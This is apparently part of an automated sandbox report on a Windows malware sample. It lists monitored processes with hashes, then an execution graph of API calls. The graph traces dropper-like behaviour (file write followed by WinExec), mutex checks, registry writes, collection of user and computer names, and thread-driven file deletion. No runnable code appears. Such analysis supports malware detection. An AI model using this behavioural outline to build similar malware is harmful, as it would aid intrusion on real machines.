                                  Path:C:\Windows\SysWOW64\cscript.exe
                                  Wow64 process (32bit):true
                                  Commandline:"cscript" "C:\Program Files (x86)\Microsoft Office\Office16\OSPP.VBS" /dstatus
                                  Imagebase:0xc60000
                                  File size:144'896 bytes
                                  MD5 hash:CB601B41D4C8074BE8A84AED564A94DC
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:false

                                  General

                                  Target ID:40
                                  Start time:02:01:35
                                  Start date:05/07/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0x4
                                  Imagebase:0x7ff70f010000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:false

                                  General

                                  Target ID:41
                                  Start time:02:01:36
                                  Start date:05/07/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0x4
                                  Imagebase:0x7ff70f010000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:false

                                  Disassembly

                                  Reset < >

                                    Execution Graph

                                    Execution Coverage:6%
                                    Dynamic/Decrypted Code Coverage:86%
                                    Signature Coverage:18.6%
                                    Total number of Nodes:1428
                                    Total number of Limit Nodes:62
                                    execution_graph 40863 4bdceb 40864 4bdcf5 __EH_prolog 40863->40864 40871 4c5ff6 40864->40871 40867 4bdd6a 40869 4bdd93 40867->40869 40883 4bdb9b 92 API calls 40867->40883 40872 4c602c TlsGetValue 40871->40872 40873 4c5fff 40871->40873 40874 4c603f 40872->40874 40875 4c6019 40873->40875 40894 4c5bf6 RaiseException TlsAlloc RtlInitializeCriticalSection 40873->40894 40878 4bdd0d 40874->40878 40879 4c6052 40874->40879 40884 4c5c8f RtlEnterCriticalSection 40875->40884 40877 4c602a 40877->40872 40878->40867 40882 4bdb78 GetWindowRect GetWindowLongA 40878->40882 40895 4c5dfe 8 API calls __startOneArgErrorHandling 40879->40895 40882->40867 40883->40869 40885 4c5cae 40884->40885 40886 4c5ce8 GlobalAlloc 40885->40886 40887 4c5cfb GlobalHandle GlobalUnWire GlobalReAlloc 40885->40887 40889 4c5d6a __startOneArgErrorHandling 40885->40889 40890 4c5d1d 40886->40890 40887->40890 40888 4c5d7f RtlLeaveCriticalSection 40888->40877 40889->40888 40891 4c5d2b GlobalHandle GlobalFix RtlLeaveCriticalSection 40890->40891 40892 4c5d46 GlobalFix 40890->40892 40896 4b9d6a RaiseException 40891->40896 40892->40889 40894->40875 40895->40878 40897 427740 40901 434b70 36 API calls 40897->40901 40899 427759 40900 42777c 40899->40900 40901->40899 40902 4234c0 40920 4bc1f4 40902->40920 40904 4234e1 40905 423523 40904->40905 40924 413930 40904->40924 40907 42351f 40907->40905 40933 424d50 40907->40933 40919 4235e4 40922 4bc1fa 40920->40922 40923 4bc218 40922->40923 40972 4ab987 40922->40972 40923->40904 40926 413951 40924->40926 40925 4139fd 40925->40907 40926->40925 41003 4c33ac 29 API calls __EH_prolog 40926->41003 40928 4139ac 41004 4c3488 32 API calls __EH_prolog 40928->41004 40930 4139d3 41005 4c3c54 39 API calls __EH_prolog 40930->41005 40932 4139e7 40932->40907 40934 424d61 40933->40934 40939 423565 40933->40939 40935 424d7a CreatePen 40934->40935 41006 4c317b 58 API calls 40934->41006 41007 4c3124 57 API calls 40935->41007 40940 424df0 40939->40940 40941 424dfd 40940->40941 40945 42356c 40940->40945 40942 424e16 40941->40942 41008 4c317b 58 API calls 40941->41008 41009 422df0 62 API calls 40942->41009 40946 424770 40945->40946 40947 423573 GetStockObject LoadCursorA 40946->40947 40948 424799 40946->40948 40958 4343b0 40947->40958 40949 4247b2 40948->40949 41010 4c317b 58 API calls 40948->41010 40950 4247e9 GetStockObject GetObjectA 40949->40950 40954 4247bd 40949->40954 40950->40954 40952 4248d6 41013 413ae0 59 API calls 40952->41013 40954->40952 41011 4c25e4 57 API calls 40954->41011 40956 424836 __ftol 41012 4c2662 58 API calls __EH_prolog 40956->41012 41014 4c5a6e 40958->41014 40961 4343d2 41019 4bea56 32 API calls __EH_prolog 40961->41019 40962 4235c4 40964 4be412 40962->40964 40965 4c5a6e 28 API calls 40964->40965 40966 4be45c 40965->40966 40969 4235d1 40966->40969 41021 4be384 40966->41021 40969->40905 40971 413a20 GetWindowLongA SetWindowLongA SetWindowPos 40969->40971 40971->40919 40975 4ab999 40972->40975 40976 4ab996 40975->40976 40978 4ab9a0 __startOneArgErrorHandling 40975->40978 40976->40922 40978->40976 40979 4ab9c5 40978->40979 40980 4ab9f2 40979->40980 40981 4aba35 40979->40981 40992 4aba20 40980->40992 40997 4b1db4 29 API calls __startOneArgErrorHandling 40980->40997 40986 4aba57 40981->40986 40981->40992 40983 4aba08 40998 4b32d1 5 API calls __startOneArgErrorHandling 40983->40998 40984 4abaa4 RtlAllocateHeap 40994 4aba27 40984->40994 41000 4b1db4 29 API calls __startOneArgErrorHandling 40986->41000 40987 4aba13 40999 4aba2c RtlLeaveCriticalSection __startOneArgErrorHandling 40987->40999 40989 4aba5e 41001 4b3d74 6 API calls __startOneArgErrorHandling 40989->41001 40992->40984 40992->40994 40993 4aba71 41002 4aba8b RtlLeaveCriticalSection __startOneArgErrorHandling 40993->41002 40994->40978 40996 4aba7e 40996->40992 40996->40994 40997->40983 40998->40987 40999->40992 41000->40989 41001->40993 41002->40996 41003->40928 41004->40930 41005->40932 41006->40935 41007->40939 41008->40942 41009->40945 41010->40949 41011->40956 41012->40952 41013->40947 41015 4c5ff6 21 API calls 41014->41015 41016 4c5a7d 41015->41016 41017 4343ba GetClassInfoA 41016->41017 41020 4c608b 7 API calls __EH_prolog 41016->41020 41017->40961 41017->40962 41019->40962 41020->41017 41022 4c5ff6 21 API calls 41021->41022 41023 4be395 41022->41023 41024 4be3c8 CreateWindowExA 41023->41024 41025 4be3a6 GetCurrentThreadId SetWindowsHookExA 41023->41025 41028 4be3d0 41024->41028 41025->41024 41026 4be3c3 41025->41026 41035 4b9d6a RaiseException 41026->41035 41029 4c5ff6 21 API calls 41028->41029 41030 4be3e0 41029->41030 41031 4c5a6e 28 API calls 41030->41031 41032 4be3e7 41031->41032 41033 4be3ff 41032->41033 41034 4be3f4 UnhookWindowsHookEx 41032->41034 41033->40969 41034->41033 41036 42e280 41037 4bc1f4 29 API calls 41036->41037 41038 42e2a6 41037->41038 41039 42e2be 41038->41039 41098 42f6e0 CreateEventA 41038->41098 41041 413930 39 API calls 41039->41041 41042 42e2d0 41039->41042 41043 42e2e9 41041->41043 41043->41042 41044 42e416 GetSystemMetrics GetSystemMetrics 41043->41044 41045 42e3f0 41043->41045 41044->41045 41075 42e630 41045->41075 41048 4be412 32 API calls 41049 42e501 41048->41049 41050 42e505 41049->41050 41051 42e51b 41049->41051 41050->41042 41052 42e50d DestroyMenu 41050->41052 41084 42e6d0 GetWindowLongA SetWindowLongA SetWindowPos GetWindowLongA 41051->41084 41052->41042 41054 42e522 GetWindowRect 41055 42e53f 41054->41055 41056 42e562 41055->41056 41099 4c07fa 41055->41099 41085 42e160 41056->41085 41060 42e57c GetStockObject 41103 4c310f 41060->41103 41063 42e58a 41064 42e591 SendMessageA 41063->41064 41065 42e58e 41063->41065 41066 42e5a9 SetWindowPos 41064->41066 41067 42e5bf 41064->41067 41065->41064 41066->41067 41068 42e5c6 GetSystemMenu 41067->41068 41069 42e5ed 41067->41069 41108 4c1845 57 API calls 41068->41108 41109 42e0a0 53 API calls 41069->41109 41072 42e5d8 41072->41069 41074 42e5dc DeleteMenu 41072->41074 41073 42e5f3 41073->41042 41074->41069 41076 4c5a6e 28 API calls 41075->41076 41077 42e63b GetClassInfoA 41076->41077 41079 42e662 LoadCursorA GetStockObject 41077->41079 41080 42e4f1 41077->41080 41110 4bea56 32 API calls __EH_prolog 41079->41110 41080->41048 41082 42e6b5 41082->41080 41111 4c322b RaiseException 41082->41111 41084->41054 41086 42e174 41085->41086 41112 434430 41086->41112 41088 42e18d 41089 434430 65 API calls 41088->41089 41096 42e19a 41089->41096 41090 42e1f2 SendMessageA SendMessageA 41091 42e22f 41090->41091 41092 42e22c DestroyCursor 41090->41092 41093 42e239 DestroyCursor 41091->41093 41094 42e23c 41091->41094 41092->41091 41093->41094 41094->41060 41102 42fcc0 79 API calls 41094->41102 41095 42e1e8 41095->41090 41096->41090 41096->41095 41128 42b5e0 41096->41128 41098->41039 41100 4c081e 41099->41100 41101 4c0804 MoveWindow 41099->41101 41100->41056 41101->41100 41102->41060 41138 4c309d 41103->41138 41105 4c3116 41146 4c1f2c 41105->41146 41107 4c3121 41107->41063 41108->41072 41109->41073 41110->41082 41111->41080 41113 43450c 41112->41113 41114 434459 41112->41114 41113->41088 41114->41113 41132 43b280 55 API calls 41114->41132 41116 434492 41117 4344fb 41116->41117 41118 434498 41116->41118 41136 4c3c54 39 API calls __EH_prolog 41117->41136 41120 4344b0 DestroyCursor 41118->41120 41121 4344ba 41118->41121 41120->41121 41122 4344c7 41121->41122 41133 4bc21d 29 API calls __startOneArgErrorHandling 41121->41133 41134 4bc21d 29 API calls __startOneArgErrorHandling 41122->41134 41125 4344d3 41135 4c3c54 39 API calls __EH_prolog 41125->41135 41127 4344e7 41127->41088 41129 42b60f 41128->41129 41130 42b5f4 GetModuleHandleA 41128->41130 41129->41095 41137 434af0 LoadImageA LoadImageA 41130->41137 41132->41116 41133->41122 41134->41125 41135->41127 41136->41113 41137->41129 41139 4c30a7 __EH_prolog 41138->41139 41152 4c5a94 41139->41152 41141 4c30ad 41142 4bc1f4 29 API calls 41141->41142 41144 4c30eb 41141->41144 41143 4c30cf 41142->41143 41143->41144 41157 4c1ec7 29 API calls __EH_prolog 41143->41157 41144->41105 41147 4c1f36 __EH_prolog 41146->41147 41148 4c1fab 41147->41148 41151 4c1f47 41147->41151 41158 4b9d6a RaiseException 41147->41158 41159 4bbeba 29 API calls 41148->41159 41151->41107 41153 4c5a6e 28 API calls 41152->41153 41154 4c5a99 41153->41154 41155 4c5ff6 21 API calls 41154->41155 41156 4c5aaa 41155->41156 41156->41141 41157->41144 41159->41151 41160 432e00 41163 450d00 GetProcessHeap 41160->41163 41164 450d75 GetModuleFileNameA 41163->41164 41165 450d63 OleInitialize 41163->41165 41216 4ac074 41164->41216 41165->41164 41167 450d97 41168 450da0 41167->41168 41169 450dbb 41167->41169 41170 4bc5f0 35 API calls 41168->41170 41227 4bc43e 35 API calls 41169->41227 41172 450db7 41170->41172 41222 4bc5f0 41172->41222 41175 450dfd 41176 450e31 LoadCursorA GetStockObject 41175->41176 41177 4343b0 33 API calls 41176->41177 41178 450e6d 41177->41178 41179 4be412 32 API calls 41178->41179 41180 450e81 GetCurrentThreadId 41179->41180 41181 450e96 41180->41181 41198 450f0a 41181->41198 41228 4134b0 7 API calls 41181->41228 41183 450fcf 41184 432e0d 41183->41184 41234 4bca6f 23 API calls 41183->41234 41185 450edb 41229 4134b0 7 API calls 41185->41229 41188 450fb6 41233 4134b0 7 API calls 41188->41233 41189 450ee9 41230 4134b0 7 API calls 41189->41230 41193 450ef9 41231 4134b0 7 API calls 41193->41231 41195 450ffb 41235 4c33ac 29 API calls __EH_prolog 41195->41235 41197 45103e 41236 427500 46 API calls 41197->41236 41198->41183 41232 4134b0 7 API calls 41198->41232 41200 451051 41237 4c3488 32 API calls __EH_prolog 41200->41237 41202 45106a 41238 4c3c54 39 API calls __EH_prolog 41202->41238 41204 451076 41239 4bcaad 23 API calls 41204->41239 41207 45119c 41241 412f80 GetProcessHeap HeapFree 41207->41241 41209 4511a4 41242 427440 64 API calls 41209->41242 41211 4511ba 41243 412f80 GetProcessHeap HeapFree 41211->41243 41213 45121e 41244 412f80 GetProcessHeap HeapFree 41213->41244 41215 45107e 41240 426ac0 7 API calls 41215->41240 41217 4ac082 41216->41217 41218 4ac091 41216->41218 41217->41167 41245 4b1db4 29 API calls __startOneArgErrorHandling 41218->41245 41220 4ac099 41246 4b1e15 RtlLeaveCriticalSection 41220->41246 41223 4bc5fc 41222->41223 41224 4bc600 lstrlen 41222->41224 41247 4bc573 41223->41247 41224->41223 41226 450dda SetCurrentDirectoryA 41226->41175 41227->41172 41228->41185 41229->41189 41230->41193 41231->41198 41232->41188 41233->41183 41234->41195 41235->41197 41236->41200 41237->41202 41238->41204 41239->41215 41240->41207 41241->41209 41242->41211 41243->41213 41244->41184 41245->41220 41246->41217 41250 4bc48a 41247->41250 41249 4bc581 41249->41226 41251 4bc49a 41250->41251 41252 4bc4ae 41251->41252 41256 4bc3ea 32 API calls 41251->41256 41252->41249 41254 4bc4a6 41257 4bc320 41254->41257 41256->41254 41258 4bc32c 41257->41258 41261 4bc335 41257->41261 41258->41252 41259 4bc33d 41264 4a9f92 41259->41264 41261->41259 41262 4bc37c 41261->41262 41263 4bc1f4 29 API calls 41262->41263 41263->41258 41271 4add18 41264->41271 41266 4a9f9c RtlEnterCriticalSection 41267 4a9fba 41266->41267 41268 4a9feb RtlLeaveCriticalSection 41266->41268 41272 4bbcdd 29 API calls 41267->41272 41268->41258 41270 4a9fcc 41270->41268 41271->41266 41272->41270 41273 432a20 41280 4bde1d 41273->41280 41276 432a3c 41285 4327d0 41276->41285 41279 432a43 41281 4c5ff6 21 API calls 41280->41281 41282 4bde2f 41281->41282 41307 4be74f 41282->41307 41286 432a0d 41285->41286 41304 4327fe 41285->41304 41286->41279 41287 432905 GetWindowRect 41315 4c2cea GetWindowLongA ScreenToClient ScreenToClient 41287->41315 41288 432964 GetClientRect 41290 4329e1 41288->41290 41291 432981 GetWindowRect 41288->41291 41317 412f80 GetProcessHeap HeapFree 41290->41317 41316 4c2cea GetWindowLongA ScreenToClient ScreenToClient 41291->41316 41293 4328f9 41293->41287 41293->41288 41298 4c07fa MoveWindow 41293->41298 41299 432960 41293->41299 41295 4329f8 41318 412f80 GetProcessHeap HeapFree 41295->41318 41296 4329a5 41296->41290 41296->41291 41300 4c07fa MoveWindow 41296->41300 41298->41293 41299->41288 41300->41296 41301 4328a8 IsWindow 41302 4328b6 SendMessageA 41301->41302 41301->41304 41312 4c0722 41302->41312 41304->41293 41304->41301 41305 413010 7 API calls 41304->41305 41305->41304 41306 42fcc0 79 API calls 41306->41276 41308 4be77e CallWindowProcA 41307->41308 41309 4be75c 41307->41309 41310 432a2b 41308->41310 41309->41308 41311 4be76a NtdllDefWindowProc_A 41309->41311 41310->41276 41310->41306 41311->41310 41313 4c0729 GetWindowLongA 41312->41313 41314 4c0735 41312->41314 41313->41304 41315->41293 41316->41296 41317->41295 41318->41286 41319 638000 41321 638044 GetPEB 41319->41321 41322 638077 CreateFileA 41321->41322 41324 638265 41322->41324 41325 63822d 41322->41325 41326 638246 WriteFile 41325->41326 41327 638244 WinExec 41325->41327 41326->41327 41327->41324 41329 4c088a 41330 4c08a0 41329->41330 41331 4c0891 ShowWindow 41329->41331 41331->41330 41332 47f900 41333 47f951 GetStockObject 41332->41333 41334 47f90b 41332->41334 41335 4c310f 57 API calls 41333->41335 41343 413ae0 59 API calls 41334->41343 41339 47f95f SendMessageA 41335->41339 41337 47f919 41337->41333 41340 47f920 41337->41340 41341 47f924 SendMessageA 41340->41341 41342 47f939 SendMessageA 41340->41342 41343->41337 41344 4bc521 41345 4bc535 41344->41345 41351 4bc548 41344->41351 41346 4bc54a lstrlen 41345->41346 41347 4bc53f 41345->41347 41349 4bc557 41346->41349 41346->41351 41352 4c1d19 41347->41352 41350 4bc320 31 API calls 41349->41350 41350->41351 41363 4c1d9d 41352->41363 41355 4c1d5f 41360 4c1d9d 29 API calls 41355->41360 41361 4c1d85 41355->41361 41367 4bc897 34 API calls 41355->41367 41356 4c1d47 41357 4bc5f0 35 API calls 41356->41357 41359 4c1d56 41357->41359 41359->41351 41360->41355 41368 4bc8e6 35 API calls 41361->41368 41364 4c5a6e 28 API calls 41363->41364 41365 4c1da3 LoadStringA 41364->41365 41366 4c1d3c 41365->41366 41366->41355 41366->41356 41367->41355 41368->41359 41369 6287e8 41370 6288f7 CreateMutexA 41369->41370 41372 6287fc 41369->41372 41370->41372 41371 62891a FindCloseChangeNotification Sleep 41371->41370 41372->41370 41372->41371 41373 62892d 41372->41373 41374 63e7e8 41375 63e8f7 CreateMutexA 41374->41375 41377 63e7fc 41374->41377 41375->41377 41376 63e92d 41378 63e964 VirtualAlloc 41376->41378 41381 63eb95 41376->41381 41377->41375 41377->41376 41380 63e9bf 41378->41380 41378->41381 41380->41381 41382 63ebc1 KiUserExceptionDispatcher 41380->41382 41383 63ebd4 41382->41383 41383->41380 41384 4c0787 41385 4c07a2 41384->41385 41386 4c0791 41384->41386 41388 4bdb5e 41386->41388 41391 4bdaf5 GetWindowLongA 41388->41391 41392 4bdb16 SetWindowLongA 41391->41392 41393 4bdb12 41391->41393 41392->41393 41394 4bdb2c SetWindowPos 41392->41394 41393->41385 41394->41393 41395 4310000 41397 4310005 41395->41397 41400 4310018 41397->41400 41419 431002b LoadLibraryExA 41397->41419 41406 431006f GetModuleFileNameA 41400->41406 41413 4310260 7 API calls 41400->41413 41404 4310170 CreateThread 41409 4310196 41404->41409 41434 43106d2 41404->41434 41405 4310136 MapViewOfFile 41405->41404 41408 431014c 41405->41408 41410 4310240 Sleep 41406->41410 41411 43101df LoadLibraryExA GetProcAddress 41406->41411 41408->41404 41409->41406 41414 431019f Sleep 41409->41414 41412 431024b ExitProcess 41410->41412 41411->41410 41415 431020c CreateMutexA GetLastError 41411->41415 41416 43100a3 41413->41416 41414->41409 41415->41410 41415->41412 41418 4310260 7 API calls 41416->41418 41418->41419 41420 4310260 41419->41420 41421 43100dc 41420->41421 41422 43101ba GetModuleFileNameA 41420->41422 41429 4310265 41421->41429 41424 4310240 Sleep 41422->41424 41425 43101df LoadLibraryExA GetProcAddress 41422->41425 41426 431024b ExitProcess 41424->41426 41425->41424 41427 431020c CreateMutexA GetLastError 41425->41427 41427->41424 41427->41426 41430 4310269 41429->41430 41430->41429 41430->41430 41431 431026c GetProcAddress 41430->41431 41433 43100f3 SetErrorMode CreateFileMappingA CreateFileMappingA 41430->41433 41432 4310260 7 API calls 41431->41432 41432->41430 41433->41404 41433->41405 41435 43107e1 CreateMutexA 41434->41435 41437 43106e6 41434->41437 41435->41437 41436 431080a Sleep 41436->41435 41437->41435 41437->41436 41438 4310817 41437->41438 41439 42a230 41440 42a247 41439->41440 41441 42a254 PeekMessageA 41440->41441 41442 42a365 41440->41442 41443 42a27d IsWindow 41440->41443 41444 413630 7 API calls 41440->41444 41445 42a351 PeekMessageA 41440->41445 41441->41440 41443->41440 41444->41440 41445->41440 41446 4360000 41448 4360005 CreateMutexA 41446->41448 41449 436001d Sleep 41448->41449 41449->41449 41450 242ed35 41487 2433600 41450->41487 41454 242ed8d CreateThread 41522 24210e5 RtlEnterCriticalSection 41454->41522 41673 242d570 GlobalAlloc 41454->41673 41456 242edb1 CreateThread 41457 24210e5 3 API calls 41456->41457 41761 24253b2 41456->41761 41458 242edd8 CreateThread 41457->41458 41459 24210e5 3 API calls 41458->41459 41717 242e507 41458->41717 41460 242edff CreateThread 41459->41460 41461 24210e5 3 API calls 41460->41461 41704 2423faa Sleep 41460->41704 41462 242ee26 CreateThread 41461->41462 41463 24210e5 3 API calls 41462->41463 41688 24257a0 GetTempPathA lstrlen 41462->41688 41464 242ee4d 41463->41464 41527 242f030 CreateFileMappingA 41464->41527 41468 242ee8f 41469 242ef86 CreateThread 41468->41469 41555 2427c71 41468->41555 41470 24210e5 3 API calls 41469->41470 41682 2421189 41469->41682 41472 242efaa CreateThread 41470->41472 41473 24210e5 3 API calls 41472->41473 41805 2423911 41472->41805 41474 242efd1 CreateThread 41473->41474 41476 24210e5 3 API calls 41474->41476 41740 2423d9b 41474->41740 41475 242ef67 41478 242f760 15 API calls 41475->41478 41479 242eff8 41476->41479 41477 242eed4 41477->41475 41485 242eee3 41477->41485 41480 242ef7b 41478->41480 41482 242f011 41479->41482 41483 242f004 Sleep 41479->41483 41480->41469 41562 242f310 41482->41562 41483->41479 41485->41477 41561 242f0b0 GetTickCount GetTickCount 41485->41561 41488 242ed42 SetErrorMode WSAStartup RtlInitializeCriticalSection RtlInitializeCriticalSection RtlInitializeCriticalSection 41487->41488 41489 242e6f0 41488->41489 41490 242e6fd 41489->41490 41567 242dc56 RegOpenKeyExA 41490->41567 41493 242e7c5 LoadLibraryA 41495 242e7e1 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 41493->41495 41496 242e844 RegOpenKeyExA 41493->41496 41494 242e77b GetProcAddress GetProcAddress GetProcAddress 41494->41493 41495->41496 41497 242e8a0 RegOpenKeyExA 41496->41497 41498 242e868 RegSetValueExA RegCloseKey 41496->41498 41499 242e8c4 RegSetValueExA RegCloseKey 41497->41499 41500 242e8fc lstrcpy lstrcat RegOpenKeyExA 41497->41500 41498->41497 41499->41500 41501 242e9b2 RegOpenKeyExA 41500->41501 41502 242e947 GetModuleFileNameA wsprintfA lstrlen RegSetValueExA RegCloseKey 41500->41502 41503 242e9da RegSetValueExA RegSetValueExA RegSetValueExA RegCloseKey 41501->41503 41504 242ea68 GetComputerNameA lstrlen 41501->41504 41502->41501 41503->41504 41505 242eae6 CreateFileMappingA 41504->41505 41506 242ea98 lstrlen 41504->41506 41507 242eb09 41505->41507 41506->41505 41575 2421b0e 41507->41575 41509 242eb13 lstrlen 41510 242eb25 41509->41510 41511 242eb2a 41509->41511 41616 24259de GetTickCount GetPrivateProfileStringA lstrlen 41510->41616 41513 242eb79 41511->41513 41519 242eba8 41511->41519 41622 24213e8 InterlockedExchange 41513->41622 41515 242eb7e GetTickCount wsprintfA 41515->41519 41516 242ec82 lstrcat GetSystemDirectoryA lstrlen 41517 242eccd 6 API calls 41516->41517 41518 242ecbd lstrcat 41516->41518 41517->41454 41518->41517 41519->41516 41520 242ec39 lstrlen wsprintfA 41519->41520 41520->41519 41521 242ec7b 41520->41521 41521->41516 41523 2421148 41522->41523 41526 2421101 41522->41526 41524 242117a RtlLeaveCriticalSection 41523->41524 41525 242115b CloseHandle 41523->41525 41524->41456 41525->41524 41526->41524 41528 242ee82 41527->41528 41529 242f07c MapViewOfFile 41527->41529 41530 242f760 41528->41530 41529->41528 41531 242f7f1 41530->41531 41532 242f7fd 41530->41532 41531->41532 41533 242f802 lstrcpy GetUserNameA 41531->41533 41532->41468 41534 2432ceb 41533->41534 41535 242f83d lstrlen 41534->41535 41536 242f852 lstrcat 41535->41536 41537 242f866 lstrlen 41535->41537 41536->41537 41539 242f896 lstrlen 41537->41539 41540 242f8dc RegOpenKeyExA 41537->41540 41539->41537 41541 242f900 41540->41541 41542 242f92d 41540->41542 41541->41532 41543 242f90b RegCreateKeyA 41541->41543 41544 242f937 41542->41544 41545 242fb29 41542->41545 41543->41542 41546 242f928 41543->41546 41547 242f94b RegEnumValueA 41544->41547 41549 242f986 RegDeleteValueA 41544->41549 41554 242f984 41544->41554 41550 242fba7 wsprintfA RegQueryValueExA 41545->41550 41551 242fa11 41545->41551 41546->41532 41547->41544 41547->41554 41548 242fcce RegCloseKey 41548->41532 41549->41547 41550->41551 41551->41532 41551->41548 41552 242fa3e wsprintfA 41553 242fade RegSetValueExA 41552->41553 41552->41554 41553->41554 41554->41551 41554->41552 41554->41553 41556 2427c8e 41555->41556 41557 2427cdd 41555->41557 41556->41557 41558 2427c97 MapViewOfFile 41556->41558 41557->41477 41558->41557 41559 2427cb7 41558->41559 41560 2427cc9 UnmapViewOfFile 41559->41560 41560->41557 41561->41485 41563 242f320 UnmapViewOfFile 41562->41563 41564 242f32d 41562->41564 41563->41564 41565 242f01c 41564->41565 41566 242f336 CloseHandle 41564->41566 41566->41565 41568 242dca7 RegSetValueExA RegCloseKey 41567->41568 41572 242dcde 41567->41572 41568->41572 41569 242dd25 lstrcpy lstrcat 41571 242dd58 41569->41571 41573 242dd94 LoadLibraryA 41571->41573 41574 242dbcc 6 API calls 41571->41574 41572->41569 41623 242dbcc RegOpenKeyExA 41572->41623 41573->41493 41573->41494 41574->41571 41576 2421b38 41575->41576 41577 2421bc3 lstrcpy GetUserNameA 41576->41577 41578 2421bbe 41576->41578 41628 2432ceb 41577->41628 41578->41509 41580 2421c05 lstrlen 41581 2421c1a lstrcat 41580->41581 41582 2421c2d lstrlen 41580->41582 41581->41582 41584 2421ca3 lstrlen wsprintfA RegOpenKeyExA 41582->41584 41585 2421c5d lstrlen 41582->41585 41586 2421d03 RegCreateKeyA 41584->41586 41587 2421f5d 41584->41587 41585->41582 41586->41578 41588 2421d2c GlobalAlloc 41586->41588 41590 2421f85 wsprintfA 41587->41590 41613 2421fea 41587->41613 41589 2427c71 2 API calls 41588->41589 41591 2421d4b 41589->41591 41592 2421fb1 RegQueryValueExA 41590->41592 41593 2421fec RegQueryValueExA 41590->41593 41595 2421d63 41591->41595 41630 2422399 41591->41630 41596 2421fe5 41592->41596 41592->41613 41593->41613 41594 242227d RegCloseKey 41594->41578 41599 2421d9b wsprintfA 41595->41599 41600 2421ecf RegCloseKey 41595->41600 41601 2421f1c 41595->41601 41596->41509 41598 2421f44 GlobalFree 41598->41578 41602 2421df3 41599->41602 41603 2421de6 41599->41603 41600->41601 41601->41578 41601->41598 41606 2421e7a RegSetValueExA 41602->41606 41607 2421e9d lstrlen RegSetValueExA 41602->41607 41603->41602 41604 2421e2f 41603->41604 41605 2421e51 41603->41605 41603->41613 41641 24216fd lstrlen wsprintfA 41604->41641 41642 24216fd lstrlen wsprintfA 41605->41642 41610 2421eca 41606->41610 41607->41610 41610->41509 41611 2421e3e lstrcpy 41611->41602 41612 2421e60 lstrcpy 41612->41602 41614 2422399 22 API calls 41613->41614 41615 242224d 41613->41615 41614->41615 41615->41578 41615->41594 41617 2425aeb lstrcpy 41616->41617 41618 2425a6b GetTickCount 41616->41618 41617->41511 41619 2425a8a 41618->41619 41672 24213e8 InterlockedExchange 41619->41672 41621 2425a9e wsprintfA WritePrivateProfileStringA 41621->41617 41622->41515 41624 242dbf6 RegSetValueExA RegCloseKey 41623->41624 41625 242dc1a RegCreateKeyA 41623->41625 41626 242dc52 41624->41626 41625->41626 41627 242dc30 RegSetValueExA RegCloseKey 41625->41627 41626->41572 41627->41626 41629 2432cf4 41628->41629 41629->41580 41629->41629 41631 2433600 41630->41631 41632 24223a6 RtlEnterCriticalSection 41631->41632 41637 242242b 41632->41637 41633 242244b 41634 242263b lstrcpy 41634->41637 41635 2422692 41640 242269b RtlLeaveCriticalSection 41635->41640 41643 2421792 41635->41643 41637->41633 41637->41634 41637->41635 41638 2422740 41638->41595 41640->41638 41641->41611 41642->41612 41644 242179f 41643->41644 41645 242180d lstrcpy GetUserNameA 41644->41645 41646 2421808 41644->41646 41647 2432ceb 41645->41647 41646->41640 41648 2421848 lstrlen 41647->41648 41649 2421870 lstrlen 41648->41649 41650 242185d lstrcat 41648->41650 41652 24218a0 lstrlen 41649->41652 41653 24218e6 lstrlen wsprintfA RegOpenKeyExA 41649->41653 41650->41649 41652->41649 41654 2421942 RegCreateKeyA 41653->41654 41655 2421964 41653->41655 41654->41655 41656 242195f 41654->41656 41657 2421adf RegCloseKey 41655->41657 41658 242198c wsprintfA 41655->41658 41656->41646 41657->41646 41659 24219e4 41658->41659 41660 24219d7 41658->41660 41663 2421a8a RegSetValueExA 41659->41663 41664 2421aad lstrlen RegSetValueExA 41659->41664 41660->41659 41661 2421a33 41660->41661 41662 2421a5c 41660->41662 41670 24216fd lstrlen wsprintfA 41661->41670 41671 24216fd lstrlen wsprintfA 41662->41671 41667 2421ada 41663->41667 41664->41667 41667->41640 41668 2421a49 lstrcpy 41668->41659 41669 2421a70 lstrcpy 41669->41659 41670->41668 41671->41669 41672->41621 41674 2427c71 2 API calls 41673->41674 41675 242d5c4 41674->41675 41676 242d5e1 GlobalFree 41675->41676 41677 242d621 RtlExitUserThread 41676->41677 41679 242d5ff 41676->41679 41679->41677 41818 242d2b0 CreateToolhelp32Snapshot 41679->41818 41681 242d6bb Sleep 41681->41679 41684 2421194 41682->41684 41683 24211fb RtlExitUserThread 41684->41683 41685 24211ee Sleep 41684->41685 41686 24211c5 WaitForSingleObject 41684->41686 41687 24210e5 3 API calls 41684->41687 41685->41684 41686->41684 41687->41684 41689 2425832 lstrcat 41688->41689 41692 2425844 41688->41692 41689->41692 41690 2425851 lstrlen lstrcpy lstrcat 41690->41692 41691 24259cf RtlExitUserThread 41692->41690 41692->41691 41693 242589d FindFirstFileA 41692->41693 41695 24259b2 FindClose 41692->41695 41696 24259bf Sleep 41692->41696 41693->41692 41694 24258c7 FindNextFileA 41693->41694 41694->41692 41697 24258e3 lstrcat lstrlen lstrlen 41694->41697 41695->41696 41696->41692 41698 242592a lstrcmpiA 41697->41698 41699 2425946 41697->41699 41698->41699 41700 2425999 Sleep 41699->41700 41702 2425970 lstrcmpiA 41699->41702 41879 2425719 41699->41879 41885 2425758 SHFileOperation RemoveDirectoryA 41699->41885 41700->41694 41702->41699 41702->41700 42265 24213e8 InterlockedExchange 41704->42265 41706 2424041 Sleep 41715 242405b 41706->41715 41707 24242b8 RtlExitUserThread 41708 2424291 Sleep 41708->41715 41709 24242a8 Sleep 41709->41715 41710 2424169 lstrcpy 41710->41715 41712 24241f2 41712->41715 42313 242c1ef 65 API calls 41712->42313 41715->41707 41715->41708 41715->41709 41715->41710 41715->41712 42266 2425be5 GetTempPathA lstrlen 41715->42266 42276 242b888 lstrcpy 41715->42276 42293 242be89 CreateFileA 41715->42293 41718 242e514 